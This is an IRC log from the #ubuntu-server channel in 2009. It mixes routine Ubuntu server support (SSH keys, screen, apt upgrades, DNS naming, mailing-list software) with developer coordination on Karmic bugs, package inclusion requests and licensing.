<mathiaz> Sam-I-Am: it may well be the case - report it then ;)
<mathiaz> Sam-I-Am: thanks for testing karmic!
<Sam-I-Am> yeah, just going to get to the bottom of it first
<Sam-I-Am> hopefully these will get looked at before release... they seem really bad... well, the su/sudo one at least.
<Sam-I-Am> if you dont know about it, you're locked out of your system
<Sam-I-Am> mathiaz: bug 423252
<uvirtbot> Launchpad bug 423252 in glibc "NSS using LDAP on Karmic (alpha 4) breaks 'su' and 'sudo'" [Undecided,New] https://launchpad.net/bugs/423252
<uvirtbot> New bug: #423246 in openldap (main) "slapd should have a ufw profile" [Undecided,New] https://launchpad.net/bugs/423246
<Claw6> is there a shell app to display whole network utilization?
<Claw6> such as htop for cpu and mem?
<Sam-I-Am> ntop!
<giovani> Claw6: this of course only reflects usage on that server, or through that server, in the case that it's a router/firewall
<Sam-I-Am> not quite...
<aubre> nmon?
<Sam-I-Am> there is iftop
<Sam-I-Am> but its still only host-based
<Sam-I-Am> you can use snmp to query your switches and aggregate i guess...
<aubre> nmon was only recently open sourced
<aubre> so I am sure it isn't in the distro yet
<giovani> yeah, I don't know what "whole network utilization" really entails
<Claw6> i need a solution that would act like "rsync -az ftp://user:pwd@domain.do /var/www
<uvirtbot> New bug: #418208 in samba (main) "package samba-common 2:3.4.0-3ubuntu1 failed to install/upgrade: podproces instalovanÃ½ post-installation skript vrÃ¡til chybovÃ½ status 1" [Undecided,Won't fix] https://launchpad.net/bugs/418208
<Claw6> i just want to download all files from a external ftp for a local backup
<Claw6> and then do a cronjob for that
 * cabbey waves at smoser
<smoser> hello to cabbey from the other side
<cabbey> looks like I might become a customer of yours soon :)
<soren> jdstrand: I was just talking to danpb over in #virt on OFTC (the libvirt channel), and he said you should probably S/GPL/LGPL/ your apparmour stuff. Do you have any idea when you'll be able to upstream it?
<orudie> how can i check the size of contents of a directory ?
<soren> orudie: du
<jdstrand> soren: the files are GPLd in the karmic patches
<jdstrand> soren: I am waiting on a kernel fix in karmic to get uploaded
<jdstrand> soren: then I can say-- look in karmic, it works!
<jdstrand> soren: I haven't been able to say that yet
<soren> jdstrand: libvirt is LGPL. They're unlikely to accept stuff that will force the rest of the project to go GPL.
<jdstrand> soren: I originally had it LGPL'd, but someone (ahem, kees ;) recommended I do GPL 3
<soren> jdstrand: Maybe you can have a quick chat with danpb yourself?
<jdstrand> soren: but the kernel patches are committed, just waiting on alpha freeze
<orudie> soren-> so with du, the numder displayed at the buttom is in bytes or kylobytes ?
<soren> orudie: kilobytes.
<cabbey> orudie: the -h option will translate it to "human readable" values like "22.5G"
<orudie> cabbey-> thanks
<orudie> how to search withing man pages ?
<sub> forward slash
<sub> then type your search terms and press enter
<guntbert> orudie: man uses your default "pager", usually "less", so "man less" will tell you more :-) (no pun intended)
<kees> jdstrand: oops, I was just voicing the "canonical default license".  :P
<jdstrand> kees: no worries
<jdstrand> kees: just a light jab. I looked at it and tossed a coin on upstream's licensing intent
<jdstrand> kees: I lost :)
<orudie> how do you generate an ssh key ?
<KillMeNow> what are you generating it for?
<KillMeNow> apache or mail?
<mushroomblue> https://help.ubuntu.com/community/SSH/OpenSSH/Keys
<mushroomblue> there you go
<orudie> mushroomblue-> so the key should be generated on the computer that i am connecting from
<orudie> right ?
<kees> jdstrand: heh
<pmatulis> orudie: on the client you generate a key-pair.  you then place the public part on the server
<orudie> ok
<guntbert> orudie: yes, because (at least in theory) your private key should never be sent over a network
<KillMeNow> protect that private key like you do YOUR privates!
<guntbert> KillMeNow: but you need not carry it with you :-)
<KillMeNow> LOL true that Guntbert
<KillMeNow> course, my wife keeps mine on the night stand next to the bed
<KillMeNow> get married, and they become detachable
<guntbert> KillMeNow: :-)
<mushroomblue> pfft.
<mushroomblue> you must've married an american woman. :)
<KillMeNow> yes
<KillMeNow> i did
<mushroomblue> Canadian women let you keep them attached. :)
<orudie> how to make file executable ?
<giovani> orudie: chmod +x filename
<orudie> how to rename screen windows ?
<PhotoJim> orudie: control-A "
<PhotoJim> orudie: if you mean the shell app "screen"
<orudie> how would i go about installing irssi ?
<orudie> apt-get install irssi ?
<giovani> orudie: yes ...
<giovani> if you installed screen, I imagine you know how apt-get works :)
<orudie> hey i havent touched shell if a few months :)
<orudie> just have to get some stuff done right now
<giovani> it would probably be useful for you to read the ubuntu server guide to get comfortable with the command line
<orudie> what is the best way to copy paste an additionaly pub key into authorized_keys ?
<giovani> you don't copy-paste
<giovani> you use cat >>
<giovani> i.e. cat key.pub >> .ssh/authorized_keys
<giovani> >> appends to the file on the right
<thowland> make sure you use 2 >>
<giovani> you mean 2 ">"
<giovani> 1 ">>"
<thowland> or you'll overwrite your existing
<giovani> sure, which shouldn't be the end of the world, since public keys should be all over
<giovani> but that's why I wrote it explicitly that way twice
<ycy> i want that a special package will never be upgraded. how can I do this?
<genii> !pinning
<ubottu> pinning is an advanced feature that APT can use to prefer particular packages over others. See https://help.ubuntu.com/community/PinningHowto
 * genii sips
<ycy> thanks
<genii> np
<orudie> i'm looking at how to set up irssi proxy to connect to with a remote client on this tutorial, and kinda stuck at the last step http://pthree.org/2007/01/06/irssi-proxy/
<orudie> giovani-> maybe you can help me one more time and hopefully last time today
<orudie> :)
<ahe> i just want to create development systems with mysql unattended and so i want to seed the mysql passwort with a default or empty password
<ahe> anyone knows how to do that?
<ahe> debconf-get-selections gives me the right settings of the type password, but is it even possible to specify a value here?
<thowland> ahe: maybe you'd do better to do a system image? (like ghost)- then you can set up a full system and clone it for each development system
<ahe> thowland: unfortunately this is not an option since i want to find a way to build such systems with deb packages
<thowland> ahe: maybe make a custom deb for mysql-server, and change the post-install script? That's where it's asking for the password.
<ahe> actually i want to find a way to do this without changing any packages because i want to be able to get all kinds of server packages and build a virtual appliance by only building a deb and providing a seed file
<ahe> so i just want to reuse the existing server packages
<ahe> i already have a tool that applies the seedfile and installs the package afterward
<orudie> where is irssi config file is located when installing from the binary in Ubuntu, and whats it called ?
<sandstrom> When will php 5.3 be in an ubuntu server edition?
<ahe> sandstrom: it's not in karmic so i guess it will be in karmic + 1
<mdz> ttx_, hi
<ttx_> mdz: hey
<mdz> ttx_, I'm back online after my flight. how are things going with alpha 5?
<ttx_> mdz: we are still blocked in some eucalyptus new classloading errors. soren is expected to drop a new version in 30 min. and respin the ISO so that we can spend the rest of the day testing
<mdz> ttx_, there is not very much day left :-/
<mdz> ttx_, have you been able to test the ISO apart from eucalyptus?
<stefan___> e
<ttx_> mdz: mathiaz is on that
<ttx_> mdz: it's in progress, no issue so far
<mdz> ttx_, I think it would be a good idea for you to join #ubuntu-release to coordinate with the release team
<ttx_> mdz: done
<giovani> orudie: by "the last step" do you mean ssh tunneling?
#ubuntu-server 2009-09-03
<smoser> ttx_, 419306
<smoser> bug 419306 affects uec/ec2 images
<uvirtbot> Launchpad bug 419306 in python-boto "boto.utils.get_instance_userdata() hangs for a long time if no userdata is provided" [High,New] https://launchpad.net/bugs/419306
<orudie> screen -r
<orudie> There is a screen on:
<orudie>         16365.pts-5.njnode      (06/09/09 02:01:52)     (Attached)
<orudie> There is no screen to be resumed.
<orudie> how can i reattach to this screen ?
<giovani> orudie: read the manpage -- you've been asking a ton of questions answered in documentation
<giovani> screen -dr will detach an attached screen, and resume it on the local terminal
<orudie> sorry giovani
<orudie> you have been really helpful all day
<orudie> :)
<orudie> i have done a lot today
<orudie> thanks for your help
<Alysum> Hi - Ive been looking at this http://www.ubuntu.com/usn/USN-802-2
<Alysum> and when I do a $ sudo apt-get install apache2 -s
<Alysum> it wants to REMOVE apache2-mpm-prefork libapache2-mod-php5 php5
<Alysum> what is going on there ?
<Alysum> prefork and php5 are essential
<Alysum> anyone?
<Alysum> 205 members in this chat room surely someone can help me out lol
<Alysum> come on guys
<giovani> Alysum: this is a community support channel, it's dinner time in the US, please don't complain that way
<Alysum> lol its an international room
<giovani> clearly if someone was around who wanted to/could help, they would
<giovani> so you complaining that you're not receiving free help in minutes is absurd
<giovani> you asked the question literally 2-3 minutes before you started complaining
<giovani> can you pastebin the full output from the command you ran?
<giovani> uh, wait a second
<giovani> this is not an update to 2.0
<giovani> it's an update to 2.2
<giovani> you seem to be trying to upgrade the wrong packages
<slangasek> Alysum: is there a reason you're not using "apt-get upgrade" to install all the applicable security updates?
<slangasek> or even "apt-get dist-upgrade" (which is sometimes needed for kernel security updates in particular)?
<slangasek> Note that the USN states: "In general, a standard system upgrade is sufficient to effect the necessary changes."
<giovani> slangasek: also note that he's upgrading the wrong packages for the USN
<giovani> and has disappeared
<giovani> after demanding help within minutes
<giovani> how courteous
<slangasek> he's still in the channel
<slangasek> and installing the wrong packages is secondary to running the wrong command entirely
<giovani> it's not the "wrong command" to manually upgrade a single package
<giovani> rather than upgrading everything
<giovani> it may not be a recommended method, but it's definitely used widely in practice
<giovani> what is relevant to his question is that he's updating different packages than the USN he's supplying is talking about
<slangasek> it's definitely not a method I recommend
<slangasek> and if you use the method I do recommend, the problem goes away.
<giovani> heh
<giovani> except when you want to selectively upgrade packages
<giovani> which you do in a production environment
<orudie> which port is used by verne.freenode.net ?
<giovani> orudie: I don't follow you? -- port 6667 is standard for irc
<orudie> giovani, i'm trying to /server add in irssi
<orudie> with the following command
<Alysum> Im never confident doing upgrades on ubuntu 8.04
<cef> btw: to avoid getting the wrong package, I ALWAYS run the standard upgrade with -s (eg: apt-get -s upgrade /or/ apt-get -s dist-upgrade) to see what it wants to install in the way of packages, and then if I want to pick and choose, I have the correct list.
<giovani> Alysum: do you run apache2 or apache2.2?
<Alysum> as it's a live server - you're worried it will break things
<orudie> giovani, /server add -auto -address verne.freenode.net -network freenode
<giovani> orudie: ok, and?
<Alysum> apache 2.2 Ive just upgraded apache2.2-common and php5
<giovani> Alysum: then why are you trying to install apache2?
<slangasek> giovani: there is no package called apache2.2 in Ubuntu 8.04 (or elsewhere), 'apache2' *is* the correct package name
<orudie> giovani, /server add -auto -address verne.freenode.net -network freenode
<orudie> giovani, Irssi: Not enough parameters given
<Alysum> yes silly me I should upgrade just the package not the whole apache I realise as it uses worker by default and not prefork
<slangasek> Alysum: however, you are more likely to break things by trying to hand-pick parts of the security updates than by installing all the related packages with apt-get dist-upgrade
<giovani> orudie: this is not an irssi support channel
<slangasek> Alysum: at the very least, that would show you which binary packages the system says should be upgraded
<Alysum> a dist upgrade on 8.04 will it upgrade it to 8.10 ?
<slangasek> no
<cef> Alysum: and if you do want to hand-pick, run a full upgrade in simulation mode (-s, as above) and you will see what it wants to do
<Alysum> yes Im familiar with -s
<slangasek> "dist-upgrade" means "do an upgrade that allows packages to be installed and removed as necessary to satisfy dependencies"
<slangasek> in this case, apt-get upgrade should work also
<Psi-Jack> Sam-I-Am: ping!
<Alysum> ok Im going to do an upgrade and pray :)
<slangasek> well, I certainly advise you to take note of the output and ask more questions if anything you see concerns you
<Alysum> ok well it says it will upgrade apache2 and Im using 2.2
<slangasek> yes, that's normal
<Alysum> doest say anything about removing mpm-prefork which is good
<Alysum> most of the packages are stuff I dont use except opsview
<Alysum> Im doing an AMI backup anyway
<Alysum> Im also confused with mysql-server [5.1.30really5.0.75-0ubuntu10] (5.1.30really5.0.75-0ubuntu10.2 Ubuntu:9.04/jaunty-updates)
<Alysum> it's really really 5.0 ?
<Alysum> then why is the packaged named 5.1 ?
<NCommander> Alysum, long story :-/
<slangasek> Alysum: the package name is "mysql-server".  The version number is "5.1.30really5.0[...]" because version numbers have to always be incrementing, so this is one of the few options available for rolling it back when a developer decides the new upstream version isn't ready.
<Psi-Jack> Ummm.
<Psi-Jack> Yuck!
<Alysum> so when it will actually be 5.1 it will be called 5.2 ubuntu? :p
<Psi-Jack> That's all I can say about using such a versioning method.
<slangasek> Alysum: no, in Ubuntu 9.10 it will be "5.1.37-1ubuntu2". :)
<NCommander> Psi-Jack, well, there are epochs which let you use lower version numbers, but it can break syncing packages to Debian.
<Alysum> btw when is the next LTS release due ?
<slangasek> what you're seeing there is an artifact of a one-time decision to roll back the version
<NCommander> Alysum, there are packages with much worse version strings
<slangasek> Alysum: 10.04 is slated to be the next LTS
<Psi-Jack> Alysum: Well, since the current one us 8.04, I'd say.. 10.04
<Alysum> ok
<NCommander> Alysum, another one you can get like that is: 10.0.1.218+10.0.0.525ubuntu1~hardy1+really9.0.124.0ubuntu2
<Alysum> then why isnt that mysql-server upgrade available to 8.04 ?
<Psi-Jack> Alysum: Because it's stable as of 8.04
<Psi-Jack> Security patches are all that go into LTS
<NCommander> Alysum, once a distribution is released, newer versions of packages are not released to it except in very rare cases, or via backports.
<Alysum> so the jaunty one isnt as stable?
<Alysum> I dont understand why have LTS then lol
<Alysum> LTS means more stability and only important upgrades ?
<NCommander> Alysum, something like that. The only upgrades in an LTS fix bugs, or security fixes
<NCommander> LTSes also are supported for 3 years on desktop, five years on server
<NCommander> vs 18 months for normal releases
<Psi-Jack> Yeah, which support means almost jack didly squat usually. heh
<Alysum> I have 7 ubuntu servers from 8.04LTS, 8.10 to 9.04
<slangasek> Psi-Jack: pardon?
<Alysum> am I doing the right thing?
<NCommander> Psi-Jack, support for an LTS, or support for a stable release
<NCommander> Alysum, generally, I'd keep them all on the last LTS unless you need something for a newer version. Don't need to upgade once every six months :-)
<Psi-Jack> Which can be a bad thing, not upgrading every 6 months. ;)
<Alysum> Im also wondering whether I should go back to Debian so I dont have to upgrade all the time...
<NCommander> Alysum, LTS's release on the same timeframe as Debian's normal releases
<NCommander> Alysum, just use LTS releases for servers.
<slangasek> /roughly/ the same timeframe
<Alysum> so 9.10LTS will be similar to Debian 5?
<Psi-Jack> 10.04 you mean?
<Alysum> sorry yes
<NCommander> Alysum, closer to what will be Debian 6
<NCommander> Since we branch off sid, and Debian plans to freeze in December
<Alysum> well there is no date set for Deb 6
<Alysum> so surely 10.04 wont be LTS by then
<NCommander> Alysum, the freeze date is going to be December 2009, unless things have hcanged since debconf
<Alysum> ok I see
<NCommander> Alysum, *sigh*, LTS releases are every two years, or every four releases.
<Alysum> ok
<NCommander> So 6.06 LTS, 8.04 LTS, 10.04 LTS, 12.04 LTS, etc.
<slangasek> there's been no committment to a 12.04 LTS
<slangasek> two years is an estimate, not a promise
<Alysum> I guess this is not the right place to open a can of worms Ubuntu LTS vs Debian :)
<Psi-Jack> I dunno. Personally, I couldn't run the same server exactly specced for 2 full years witout upgrading. That's /very/ long wait times between major important upgrades.
<cef> NCommander: actually that's not strictly true.. it's currently that way, and they plan to keep it that way, but it's been acknowledged that it's not a 'hard and fast' rule.
<NCommander> Psi-Jack, define important upgrades
<Psi-Jack> NCommander: What version of OpenLDAP comes with 8.04?
<Alysum> In my case it' just a LAMP server
<NCommander> Psi-Jack, 2.4.9
 * NCommander had to look it up
<Psi-Jack> Precisely, with a very bad version of BerkeleyDB and there's been MAJOR and important changes in OpenLDAP between 2.4.9 and 2.4.17.
<NCommander> Psi-Jack, then request a backport
<Psi-Jack> Show-stopper issues resolved in between , too.
<cef> Psi-Jack: in my case, it's the reverse.. as long as there is security updates, then I'm fine. I've had countless small upgrades break major and important servers before through version creep
<Alysum> one thing that is missing in Ubuntu8.04LTS is subversion1.6.1
<Psi-Jack> Bleh, it's all about git.
<Psi-Jack> One thing that's missing and this looks quite intentional.
<Psi-Jack> Is linux-igd for 8.04 specifically.
<NCommander> Alysum, 1.5 is available for Hardy
<Psi-Jack> linux-igd was in 7.10, 7.04, and is in 8.10, 9.04, but specifically skipped 8.04 outright, and to this day, still no backport exists for it.
<Alysum> NCommander:  yes and we want subversion 1.6!
<NCommander> Alysum, request a backport for it then :-P
<Psi-Jack> And as you said, under rare occasions, backports are made.
<NCommander> Psi-Jack, its made when a user requests it, and a backporter ACKs it
<NCommander> Psi-Jack, linux-igd was deleted from Hardy intentionally
<NCommander> The comment was "unmaintained, broken with current kernel, removed in Debian"
<NCommander> A new version was published in Debian after Hardy, and that was auto-imported into Intrepid it seems
<Armour> Hi all.. I  am configuring a DNS server, I am not a pro on this. I have seen in many tutorials that people use server.domain.loca.l on the entries for the local zone. I did not use that nomenclature I just used  server.domain. Would that make difference at all?
<Bilge> derp
<giovani> Armour: nope, it's arbitrary
<giovani> .local is an accepted standard though
<slangasek> using .local conflicts with the use of mdns
<cef> the main thing is you don't want it to clash with anything that's proposed or current
<Armour> giovani: I am also setting up the server for LDAP+SAMBA... so maybe .local could be better
<slangasek> while this was an arbitrary limitation imposed on the world by the mDNS inventors, it does mean that .local should be avoided in practice for DNS
<cef> Armour: might be, simply cos it'll most likely be what the tutorials also use, and avoids config issues
<Armour> cef: I see.  I think I will try to go by the book, since this is my first linux DNS I configure
<giovani> slangasek: I disagree ... DJ Bernstein is an advocate of using .local in DNS
<slangasek> DJ Bernstein is an advocate of all kinds of insane things
<giovani> Microsoft also lists it as a best practice for internal networks
<giovani> and they're a pioneer of mDNS
<giovani> while these clearly aren't RFCs, they aren't negligible either
<slangasek> no, those are both negligible
<slangasek> the only things that count are a) the RFCs, b) real-world interop problems
<giovani> Armour: take your advice from whom you like
<slangasek> if you use .local as a DNS domain, you will have interop problems with avahi
<Psi-Jack> slangasek: Actually, I had exactly the opposite.
<Psi-Jack> I /had/ problems by /not/ having .local in DNS
<Armour> all right.... I already have it configured without the .local I been having some resolution problems internally on the network but that might also be a rookie problem. I am going to think it over and maybe I change it to .local
<Armour> Thank you all for the quick response
<Armour> I changed all to domain.local and got a bad owner name error (check-names)
<Armour> so I guess did not like it
<orudie> i just set up irssi proxy , how would i connect to it with xchat ?
<Psi-Jack> Oi, well that was fun.
<Psi-Jack> First my UPS goes nuts and rings out non-stop, then freenode detected I had an open proxy, which I didn't know about.
<giovani> Psi-Jack: an unknown open proxy? how'd that happen?
<Psi-Jack> giovani: Ehh, installed hapv, and didn't know Debian default config was to have it publically open.
<twb> I hate how openssh-server does that, too
<twb> I wish debconf would prompt you to optionally add an AllowedUsers list
<Psi-Jack> Ugh, I'd hate that, myself. heh
<Psi-Jack> Sane safe defaults, are fine, outright open and vulnerable, is not.
<twb> Psi-Jack: you would just pick "no, fuck off" which would be the default in debconf
<twb> ssh defaults to listening to connects from anywhere, from anyone.  That'd be safe if the system didn't have users on it with stupidly weak, unchanging passwords :-/
<Psi-Jack> That's why you setup password policies.
<Psi-Jack> That's easy.
<twb> True
<Psi-Jack> And not openssh's job, either. :)
<Psi-Jack> Anyway, I'm tired, and heading off to bed. Night.
<twb> Usually the scenario is one server and a bunch of Windows desktops & users, plus one administrative account that we use to ssh into remotely.
<twb> I guess nobody has bothered to force the Windows users to have strong passwords on those sites
<Psi-Jack> Bleh. I rarely deal in WIndows anymore.
<Psi-Jack> Home and Work, small handful of Windows, the rest, Linux and OSX
<Psi-Jack> Anyway, I'm off. ;0
<twb> Hey, so out of curiosity I tried to apply my LTS desktop build procedure to 9.04, the latest release.
<twb> I get this: + auth-client-config -a -p lac_ldap ==> Error in updating the file: 'pam_account' not found
<eeguy_> I'm running ubuntu server 9.04 and I'm trying to recompile the latest openldap with openssl support. configure can't seem to find my TLS/SSL no matter what I do. I've recompiled and installed openssl from both tarball, and ubuntu source, using both make install and checkinstall. I always get the errors of: configure: error: Could not locate TLS/SSL package
<eeguy_> the two lines before that are 1: checking for SSL_library_init in -lssl... no and 2: checking for ssl3_accept in -lssl... no
<twb> eeguy_: the default OpenLDAP package should be compiled with SSL support.
<eeguy_> yeah, it's compiled with gnutls
<twb> Is this a problem?
<eeguy_> which is broken, and has support issues with the openldap project
<twb> Have you reported this on launchpad?
<eeguy_> I'm pretty sure it's been reported.. I was chatting with a guy on the openldap channel last night that's tried to take this up several times
<eeguy_> I have been trying to work with them to get this running... doesn't seem like they like supporting gnutls at all, and  have been forced into it by debian
<twb> Debian (and Ubuntu) doubtless use gnutls because it is illegal for them to distribute binaries of openldap that link against openssl.
<cef> eeguy_: you've installed the libssl-dev packages?
<twb> http://bugs.debian.org/428385
<eeguy_> no.. that might be the missing link.. I installed all the other dependencies.   is libssl openssl?
<cef> afaik, it's the dev libs you need
<eeguy_> I'll give it a shot.. thanks. I've been searching all over for that
<Boohbah> twb: and which license prevents that? openssl and openldap are distributed under BSD-style licenses
 * Boohbah reads the bug
<twb> Boohbah: looks like the problem is that lots of OTHER programs, which are GPL, use openldap and thus link to openssl indirectly.
<mattgyver> when booting my computer, it reboots at "Starting Samba Daemons" it just goes into an infinite loop.  Anyone know why?
<twb> No, but try putting set -x at the top of /etc/init.d/samba
<twb> It might actually finish the samba step and then hang in the next part.
<uvirtbot`> New bug: #423579 in amavisd-new (universe) "Spam hangs amavisd" [Undecided,New] https://launchpad.net/bugs/423579
<bigbrovar> hi guys am trying to configure sudo so that admin members can only install and upgrade their system and nothing more .. hence sudo will only be used when with apt-get and aptitude
<bigbrovar> of cus root user would still have absolute powers :)
<acalvo> Hi
<acalvo> I want to install the mailman package
<acalvo> but I don't want to install apache also, I've a dedicated server with apache
<acalvo> is there any chance to just install mailman?
<acalvo> or is it any other way to install mailman and point to my mail server instead of the local server?
<acalvo> s/local server/localhost
<ghostlines> does anyone have any experience recovering mp3 files with foremost?
<uvirtbot`> New bug: #423653 in openvpn (universe) "Openvpn + rkhunter + postfix = openvpn client not able to start " [Undecided,New] https://launchpad.net/bugs/423653
<mattgyver> when i try to boot my server, it resets itsself at "Starting Samba Daemons", and goes into an infinite loop.  Any ideas?
<acalvo> I want to install the mailman package, but I do not want to install the apache or other web stuff. I want to use another machine which is configured as a web server. Is it any chance to use install only the mailman package? or I can install the mailman package on the web server and point it to use my mail server?
<nijaba> Daviey: mir bug #423667 filed
<uvirtbot`> Launchpad bug 423667 in ubuntu-server-tips "[MIR] fortunes-ubuntu-server" [Medium,New] https://launchpad.net/bugs/423667
<nijaba> acalvo: not possible AFAIK.  Mailman web interface is required on the same machine unless I have missed something
<acalvo> that's what I've believed
<acalvo> so bad then
<alexm> acalvo: nijaba is right, mailman needs the CGI and SMTP scripts on the same host
<acalvo> ok, thank you both
<acalvo> any other software that offers mailing lists?
<alexm> sympa
<acalvo> maybe with a LDAP plugin?
<nijaba> acalvo: check out sympa
<nijaba> alexm: :)
<acalvo> twice
<acalvo> should be good then
<acalvo> web dependent too?
<alexm> acalvo: and sympa is written in Perl not Python, just in case that is a plus for you ;)
<acalvo> it is
<nijaba> acalvo: for ldap and mailman, check out: http://nicolas.barcet.com/drupal/fr/mmldap
<alexm> it is for me, but I learnt about sympa too late
<alexm> acalvo: don't know whether it's web dependent or not
<acalvo> I'll check it now
<acalvo> and thanks, nijaba, cleanest way to create lists based on ldap searches
<acalvo> :D
<nijaba> acalvo: been using it since 2005 with no problems so far :)
<acalvo> wow
<acalvo> sympa depends on a lot more packages!
<acalvo> mainly mysql and sendmail
<acalvo> so same problem, I want to use another mysql server and I've already configured dovecot, so no sendmail installed neither
<nijaba> Daviey: FFe file as well bug #423678
<uvirtbot`> Launchpad bug 423678 in ubuntu-server-tips "[FFe]] fortunes-ubuntu-server" [Medium,New] https://launchpad.net/bugs/423678
<alexm> acalvo: dovecot deals both with MTA and MDA part?
<acalvo> dovecot acts as LDA and MDA
<acalvo> and MTA, yes
<acalvo> postfix relays on dovecot
<Daviey> nijaba: great!
<alexm> you can use postfix as MTA working together with dovecot ad MDA, it's a standard procedure on ubuntu server, see the server guide
<acalvo> yes, I've did it
<garymc> Hi im trying to connect to a server which i just re installed. Now when i try to ssh to it it says host key verifcation failed
<garymc> how do i fix this
<acalvo> but the sympa package is trying to install sendmail
<acalvo> is it really needed?
<acalvo> since I've already have a MTA and MDA
<alexm> acalvo: ah, ok... it shouldn't
<alexm> maybe a bug
<alexm> or maybe the package knows only to deal with sendmail
<acalvo> could be
<alexm> acalvo: deps say.. sendmail (>= 8.9) | mail-transport-agent
<acalvo> so, yes, it needs sendmail as MTA
<alexm> and postfix should fulfill mail-transport-agent
<acalvo> I think I've to use majordomo again
<acalvo> I don't really like it
<acalvo> no admin UI
<acalvo> just cmd
<acalvo> few options
<acalvo> etc
<alexm> acalvo: sendmail (>= 8.9) | mail-transport-agent means sendmail or MTA
<acalvo> but it will install it
<garymc> ok nevermind fixed itg
<Daviey> nijaba: slightly modded the bug description.
<alexm> acalvo: there's something else that maybe triggering sendmail
<nijaba> Daviey: sure...  on which one, FFe or MIR?
<Daviey> nijaba: FFe.
<acalvo> Conf sendmail-base (8.14.3-6 Ubuntu:9.04/jaunty)
<acalvo> Conf sendmail-cf (8.14.3-6 Ubuntu:9.04/jaunty)
<acalvo> Conf sendmail-bin (8.14.3-6 Ubuntu:9.04/jaunty)
<acalvo> Conf sensible-mda (8.14.3-6 Ubuntu:9.04/jaunty)
<acalvo> Conf sendmail (8.14.3-6 Ubuntu:9.04/jaunty)
<alexm> acalvo: i just tried in a jaunty and it doesn't install sendmail for me :P
<Daviey> nijaba: There are two scripts in the package, one by me, and the other kirkland
<acalvo> :O
<Daviey> nijaba: RE, MIR
<acalvo> I don't get it then
<acalvo> that's the packages list to be installed: doc-base libappconfig-perl libarchive-zip-perl libcgi-fast-perl libconvert-binhex-perl libcrypt-ciphersaber-perl libdbd-mysql-perl libdbi-perl
<acalvo>   libfcgi-perl libfreezethaw-perl libintl-perl libio-stringy-perl libmd5-perl libmime-charset-perl libmime-encwords-perl libmime-perl libmime-tools-perl
<acalvo>   libmldbm-perl libmsgcat-perl libmysqlclient15off libnet-daemon-perl libplrpc-perl libtemplate-perl libuuid-perl libxml-libxml-common-perl
<acalvo>   libxml-libxml-perl libxml-namespacesupport-perl libxml-sax-expat-perl libxml-sax-perl m4 make mhonarc mysql-common perl-suid procmail sendmail
<acalvo>   sendmail-base sendmail-bin sendmail-cf sensible-mda
<alexm> acalvo: are you sure that you have postfix installed?
<nijaba> Daviey: ah, sorry, I only noticed one :(
<acalvo> alexm: err... no
<acalvo> you're right
<alexm> :)
<acalvo> tried on the bad server
<acalvo> ehehehe
<acalvo> thank you alexm, too many hours working can trick your mind
<Daviey> nijaba: /usr/bin/<-- wrapper script, mainly for checking locale and presenting a valid motd, or default if not found.
<alexm> acalvo: anytime :)
<nijaba> Daviey: ah, right
 * alexm goes to lunch now
<nijaba> Daviey: did you modify the mir accordingly?
<alexm> acalvo: let me know how the sympa install is going, i'm very interested
<acalvo> ok, one sec
<Daviey> nijaba: no, happy to.. but didn't want to edit it if it was your WIP
<nijaba> Daviey: please feel free
<alexm> acalvo: i meant how it works after installing it ;)
<acalvo> jajaj I know
<acalvo> thank you!
<alexm> ok, then see you again soon
<Daviey> nijaba: updated
<nijaba> Daviey: thanks :)
<Daviey> nijaba: wait and see what MIR team say :)
<nijaba> Daviey: MIR should not be a problem, FFe might...
<Daviey> nijaba: surely, the fact that it is already in the archives makes some difference?
<Daviey> i thought FFe would be trivial, but MIR the challenge :S
<nijaba> Daviey: the critical point is not the package itself, but the fact that we want to install it by default
<Daviey> nijaba: Isn't that a -server team choice?
<nijaba> Daviey: that needs to be validate by the release team once feature freeze is active
<Daviey> ahh
<nijaba> Daviey: we got already a review by lool on the MIR.  Thanks lool
<Daviey> lool: \o/
<lool> :)
<lool> Daviey, nijaba: Actually I missed something; you guys wrote that it builds a pot during build, but grepping the build log for pot doesn't yield anything and pkgstriptranslations doesn't find any either
<lool> Could yo umake sure you generate an up-to-date .pot during build as to allow Rosetta to pick an always fresh one
<Daviey> lool: yeah, the pot generation is currently manually done :(
<lool> Should be updated in each build and a .pot needs to be in the source dir at end of build
<lool> Currently it wont be picked up by rosetta
<Daviey> lool: ok.. i'm adding your previous suggestions upstream as we speak
<lool> Usually we do that in the packaging
<Daviey> lool: the packaging is in the upstream project :)
<lool> Oh ok
<pavel>  question. i set up irssi with a proxy module, the proxy is running but i am having trouble connecting
<dmacnutt> does openldap have an email list distribution list function?
<pmatulis> pavel: try in #irssi
<mattgyver> Transferring Multiple files via sftp from my computer, to my server within my LAN, is resetting the server, does anyone know why?
<mattgyver> This is not a problem from outside my lan
<pmatulis> mattgyver: check logs?
<mattgyver> pmatulis, i havent yet, which one would you suggest looking at?
<pmatulis> mattgyver: force another "error" and then 'ls -ltr /var/log' is a trick
<mattgyver> cool
<pmatulis> mattgyver: can also start sshd like '/usr/sbin/sshd -dd', check man page for what that does
<mattgyver> great
<alvin> Weird, I enabled Intel VT in the bios and kvm still says it's disabled in the bios.
<alvin> Well, it'll have to wait till next week
<heath|work> How do you disable a user password. Someone enabled it by passwd, but I need it disabled
<genii> heath|work: (sudo) passwd -i 0 username
<heath|work> cool. thanks genii
<genii> np
<pavel> is anyone here familiar with connecting to irssi proxy with xchat from a remote computer ?
<giovani> pavel: nope, but #irssi might
<Psi-Jack> Oi. Setting up VPN with OpenVPN is such a pain!
<guntbert> !version
<ubottu> To find out what version of Ubuntu you have, type Â« lsb_release -a Â» in a !shell - To know the available version of a package, Â« apt-cache policy <package> Â»
<FluxD> Hi, is there any difference on the new ubuntu concerning apt-get? It gives me new errors about dependancies which the older versions didnt have?
<FluxD> Why does apt-get install ubuntu-desktop give me dependancies error?
<Psi-Jack> Why would you be doing that on a server?
<FluxD> Psi-Jack, its because the latest desktop version avaialble is 8.04 lts so I thought I would install 9.04 server with gui
<jart> hello
<FluxD> hi
<Psi-Jack> FluxD, Well, X is not supported on a server platform, nor Ubuntu-Server.
<Psi-Jack> You have absolutely no reason to install X on a real server.
<Psi-Jack> No good reason, for sure.
<FluxD> Psi-Jack, I have done this before, after installing server version I did apt-get install ubuntu-desktop and I had gui thru nx
<FluxD> 8.10 and 8.04
<guntbert> FluxD: what do mean by "latest desktop version avaialble is 8.04 lts" ?
<Psi-Jack> FluxD, Again. X is not supported for servers.
<Psi-Jack> FluxD, You need #ubuntu for that.
<Psi-Jack> Because it's /not/ supported, here.
<danielgianni> Hi guys, someone uses HAL on ubuntu server? I tried but ended up giving up and returning to the autofs automount cdrom
<Psi-Jack> FluxD, Nor is it supported by Canonical themselves.
